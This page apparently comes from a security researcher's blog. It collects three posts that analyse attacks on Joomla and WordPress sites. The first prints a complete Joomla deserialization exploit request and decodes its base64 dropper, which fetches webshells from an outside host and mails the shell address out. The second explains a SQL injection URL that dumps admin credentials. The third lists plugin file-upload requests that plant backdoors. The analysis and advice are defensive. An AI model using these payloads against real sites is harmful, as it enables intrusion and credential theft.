neonprimetime security , just trying to help: Joomla

Showing posts with label Joomla. Show all posts

Thursday, September 1, 2016

Joomla DeSerialize Deobfuscation 101

Saw this web request , it is the Joomla unserialize vulnerability. Going to walk through below how to see what it's doing.

GET /

}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3738:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEveHh4eC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDIxbFpHbGhMMk56Y3k1d2FIQWlJRHNOQ2lSMFpYaDBJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl0Y25SbkxuVnBMbkJvYVc1dFlTNWxaSFV1Y0dndlkyOXRjRzl1Wlc1MGN5OXFiMjl0YkdFdWRIaDBKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJwdFlXbHNMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5cWJXRnBiSG91ZEhoMEp5azdEUW9rYjNCbGJqSWdQU0JtYjNCbGJpZ2tZMmhsWTJzeUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNHVnVNaXdnSkhSbGVIUXlLVHNOQ21aamJHOXpaU2drYjNCbGJqSXBPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR05vWldOck1pa3BldzBLSUNBZ0lHVmphRzhnSkdOb1pXTnJNaTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeklpT3cwS1pXTm9ieUFpWkc5dVpUSWdMbHh1SUNJZ093MEtEUW9rWTJobFkyc3pQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDBndWFIUnRJaUE3RFFva2RHVjRkRE1nUFNCb2RIUndYMmRsZENnbkp5azdEUW9rYjNBelBXWnZjR1Z1S0NSamFHVmphek1zSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3TXl3a2RHVjRkRE1wT3cwS1ptTnNiM05sS0NSdmNETXBPdzBLRFFva1kyaGxZMnMwUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJOb1pXTnJMbkJvY0NJZ093MEtKSFJsZUhRMElEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5eGNTNTBlSFFuS1RzTkNpUnZjRFE5Wm05d1pXNG9KR05vWldOck5Dd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTBMQ1IwWlhoME5DazdEUXBtWTJ4dmMyVW9KRzl3TkNrN0RRb05DaVJqYUdWamF6VTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2TDIxbFpHbGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmJYSjBaeTUxYVM1d2FHbHViV0V1WldSMUxuQm9MMk52YlhCdmJtVnVkSE12Y1hGNkxuUjRkQ2NwT3cwS0pHOXdOVDFtYjNCbGJpZ2tZMmhsWTJzMUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEVXNKSFJsZUhRMUtUc05DbVpqYkc5elpTZ2tiM0ExS1RzTkNnMEtKR05vWldOck5qMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0lpT3cwS0pITjFZbXBsWTNRZ1BTQW5TbTl0SUhwNmVpQW5JQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9rYUdWaFpHVnlJRDBnSjJaeWIyMDZJRXRsYTJ0aGFTQlRaVzV6Wlc0Z1BIWnZibEpsYVc1b1pYSjZTMnhoZFhOQVUyRnBhMjkxYm1GSWFXSnBMbU52YlQ0bklDNGdJbHh5WEc0aU93MEtKRzFsYzNOaFoyVWdQU0FpVTJobGJHeDZJRG9nYUhSMGNEb3ZMeUlnTGlBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDA1QlRVVW5YU0F1SUNJdmJHbGljbUZ5YVdWekwycHZiMjFzWVM5cWJXRnBiQzV3YUhBL2RTSWdMaUFpWEhKY2JpSWdMaUJ3YUhCZmRXNWhiV1VvS1NBdUlDSmNjbHh1SWpzTkNpUnpaVzUwYldGcGJDQTlJRUJ0WVdsc0tDUjBiM29zSUNSemRXSnFaV04wTENBa2JXVnpjMkZuWlN3Z0pHaGxZV1JsY2lrN0RRb05Da0IxYm14cGJtc29YMTlHU1V4RlgxOHBPdzBLRFFvTkNqOCsnKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd

Joomla wasn't validating input and when de-serializing this blob above would actually evaluate and execute some of it. What you may ask? Well take the base64 encoded stuff and do a quick decode and you get.

$check = $_SERVER['DOCUMENT_ROOT'] . "/media/xxxx.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2Nzcy5waHAiIDsNCiR0ZXh0ID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9qb29tbGEudHh0Jyk7DQokb3BlbiA9IGZvcGVuKCRjaGVjaywgJ3cnKTsNCmZ3cml0ZSgkb3BlbiwgJHRleHQpOw0KZmNsb3NlKCRvcGVuKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjaykpew0KICAgIGVjaG8gJGNoZWNrLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2ptYWlsLnBocCIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9qbWFpbHoudHh0Jyk7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0czIiOw0KZWNobyAiZG9uZTIgLlxuICIgOw0KDQokY2hlY2szPSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL0guaHRtIiA7DQokdGV4dDMgPSBodHRwX2dldCgnJyk7DQokb3AzPWZvcGVuKCRjaGVjazMsICd3Jyk7DQpmd3JpdGUoJG9wMywkdGV4dDMpOw0KZmNsb3NlKCRvcDMpOw0KDQokY2hlY2s0PSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2NoZWNrLnBocCIgOw0KJHRleHQ0ID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9xcS50eHQnKTsNCiRvcDQ9Zm9wZW4oJGNoZWNrNCwgJ3cnKTsNCmZ3cml0ZSgkb3A0LCR0ZXh0NCk7DQpmY2xvc2UoJG9wNCk7DQoNCiRjaGVjazU9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvL21lZGlhL2ptYWlscy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwOi8vbXJ0Zy51aS5waGlubWEuZWR1LnBoL2NvbXBvbmVudHMvcXF6LnR4dCcpOw0KJG9wNT1mb3BlbigkY2hlY2s1LCAndycpOw0KZndyaXRlKCRvcDUsJHRleHQ1KTsNCmZjbG9zZSgkb3A1KTsNCg0KJGNoZWNrNj0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL3Nlc3Npb24vc2Vzc2lvbi5waHAiIDsNCiR0ZXh0NiA9IGh0dHBfZ2V0KCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9VSEFHVDg4NycpOw0KJG9wNj1mb3BlbigkY2hlY2s2LCAndycpOw0KZndyaXRlKCRvcDYsJHRleHQ2KTsNCmZjbG9zZSgkb3A2KTsNCg0KJHRveiA9ICIiOw0KJHN1YmplY3QgPSAnSm9tIHp6eiAnIC4gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ107DQokaGVhZGVyID0gJ2Zyb206IEtla2thaSBTZW5zZW4gPHZvblJlaW5oZXJ6S2xhdXNAU2Fpa291bmFIaWJpLmNvbT4nIC4gIlxyXG4iOw0KJG1lc3NhZ2UgPSAiU2hlbGx6IDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qbWFpbC5waHA/dSIgLiAiXHJcbiIgLiBwaHBfdW5hbWUoKSAuICJcclxuIjsNCiRzZW50bWFpbCA9IEBtYWlsKCR0b3osICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KDQoNCj8+'));
fclose($fp);

Above you see they are opening a new file in your web root folder called xxxx.php and writing something to it. What you may ask? Let's do a base64 decode again on whatever it is. Ah interesting, we get some PHP code below

<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/media/css.php" ;
$text = http_get('http://mrtg.ui.phinma.edu.ph/components/joomla.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."
";
}else
echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/media/jmail.php" ;
$text2 = http_get('http://mrtg.ui.phinma.edu.ph/components/jmailz.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."
";
}else
echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/H.htm" ;
$text3 = http_get('');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/media/check.php" ;
$text4 = http_get('http://mrtg.ui.phinma.edu.ph/components/qq.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "//media/jmails.php" ;
$text5 = http_get('http://mrtg.ui.phinma.edu.ph/components/qqz.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('http://pastebin.com/raw/UHAGT887');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

$toz = "";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen ' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);

?>

Now the attacker can access the file on your site www.mysite.com/media/xxxx.php. As soon as he does, the php code above creates another file called css.php which is based off the contents of this malicious url hxxp://mrtg.ui.phinma.edu.ph/components/joomla.txt . Actually it does this over and over creating a bunch of backdoors or webshells so that even if the good guy finds and removes 1 or 2 of these files, the attacker will still have a way back onto your compromised machine. Finally at the end an email is sent to indicate the code ran succesfully.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, August 2, 2016

Joomla SQL Injection Walk-Through

I saw this pastebin post with a joomla sql injection exploit perl script that I thought was interesting enough to write a bit about.

Upon reviewing the code I see that the exploit constructs a url such as

http://victim.com/index.php?option=com_jumi&fileid=93&Itemid=117+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/jos_users+--+

This appears to exploit a Joomla com_jumi parameter called 'Itemid' that must not properly sanitize user input and thus allows for sql commands to be injected and executed against the database.

It's likely that behind the scenes the Joomla developers are performing a query on the database such as

select |24 fields| from |itemtable| where Itemid = HttpRequest["ItemId"]

But since they aren't sanitizing the ItemId parameter an attacker can enter a value such below (notice the + signs above are simply a way to encode spaces in a URL so I've removed them). Also notice that /**/ is just an empty comment and does nothing except obfuscate so it can safely be removed for analysis. Also notice that 0x3a is the hex equivalent of the single colon character (:) so I've replaced it also for simplicity.

ItemId=117 UNION SELECT 1,concat(username,':',password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from jos_users --

So you see above that we first pass in an actual item id (117) so that the query returns at least a single record. Next there is a "union select" which means weren't going to union or concatenate or join the results of the SQL query defined by the developer with a SQL query we are going to define. Now in order to union or combine 2 SQL queries the number of columns must match, thus the reason you see 24 columns (23 of them are integer values that the system would automatically cast/convert into string if needed). The attacker must know that column #2 is the one that the website displays on the screen in the html response, thus they choose to display their exfiltrated data in column #2. What they display is the username and password concatenated together from the jos_users table. It is likely the case that the 1st record in this table is the Joomla administrator, thus if this attack is successful, the administrative username and password will be displayed out to the browser.

To prevent this as a Sys Admin of a Joomla site, upgrade and patch as soon as patches are available. If you see active exploits, implement an IPS (intrusion prevention system) that allows you to block malicious looking requests like this.

To prevent this as a web developer, use strongly typed parameterized SQL queries so that an Integer (like ItemId) cannot be converted into a string. Also utilize a standard Security library that sanitized or encodes malicious looking characters like the +,/,*, or -

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, May 31, 2016

A File Upload Vulnerability barrage

I noticed a series of Wordpress/Joomla file upload attacks from a single IP address / attacker in a short period of time. Some of the requests were listed here. What I found interesting was not the fact that most were well known Wordpress vulnerabilities that are still unpatched by many web administrators. What I found interesting was the methodology of the malicious actor. It's likely what they have written is some sort of script/automated scanning tool, perhaps even a botnet or something that is doing this automatically. I envision that the code/script doing this probably has an array or list of well known Wordpress file upload vulnerabilities. It's probably a flexible dynamic list so that as soon as the attacker hear's about a new Wordpress file upload vulnerabilty, he can literally just add a URL path and a post parameter for the file name, and the script/botnet will probably just start scanning and attacking the internet trying to upload malicious files. Then there is likely a follow-up script that runs shortly after that connects to the uploaded backdoors and validates which ones were successful or not. In all the cases below the attacker uploads the same malicious file/name upfilees.php so that the attacker can easily go back later and determine if this was a device they compromised or not. The backdoor is probably a web shell that gives them full access to the web server's file system and the ability to run commands against the web server. Below I did my best to research a few of the attacks seen in this cycle and explain a bit.

yiw_contact[]=upfilees.php
yiw_action=sendemail

In the above HTTP Post, there were 2 parameters that started with yiw. This indicates that the attacker is likely trying to explpoit the Beauty & Clean Theme File Upload Wordpress Vulnerability which is literally as simple as posting your backdoor file to the contact field via the sendmail action. If it succeeds, your file has been uploaded to the web server.

POST/uploadify/uploadify.php
Filedata=upfilees.php

In the next HTTP Post, the attacker is likely attempting to exploit the Event Calendar Arbitrary Wordpress File Upload Vulnerability which is also as simple as passing the file you wanted uploaded as a post parameter to the uploadify.php page. Again, if successful, the attacker just uploaded a php web page to your server and can now do whatever they please.

POST/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=
Filedata=upfilees.php.suspected
Filename=send.php.suspected

In the next HTTP Post, the attacker is trying to exploit the tinybrowser Remote File Upload Joomla Vulnerability which is another simple vulnerability that involves posting the file you want uploaded as a parameter to the upload_file.php page. We're getting a bit repetitive and non-creative in these vulnerabilities, aren't we?

update_file=upfilees.php
action=revslider_ajax_action

In the next HTTP Post, the attacker is trying to exploit the RevSlider Wordpress File Upload Vulnerability which again requires nothing more than chosing the right action parameter and posting the file, and guess what the web server will be compromised with a nice php backdoor. Oops.

POST /sites/all/libraries/elfinder/php/connector.minimal.php
upload[]=upfilees.php
cmd=upload

In the next HTTP Post, the attacker appears to just be looking for poorly configured systems that have purposely enabled the ELFinder File Manager feature which allows you to remotely manage your web server's file system. Hmmm, can that be exploited? Yep, just post the upload command and your backdoor, and the attacker is in business.

POST /license.php
filename=upfilees.php

The final attack, I believe may be just a standard filename/location that certain attackers or botnets use to exploit systems. They probably exploited this server at some point, and added a backdoor called 'license.php' which allows arbirary file upload. So this attacker is just taking advantage of another attacker's prior compromise of this device. Easy pickings if it exists.

Wordpress & Joomla plugins should not be trusted (like anything else for that matter) and should only be added if absolutely needed. If you do need them, then you better be certain to keep them patched and updated. If you have a plugin that is really not necessary, please, please, please remove those extraneous plugins as otherwise they're going to open up huge ugly gaping holes in your security posture.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0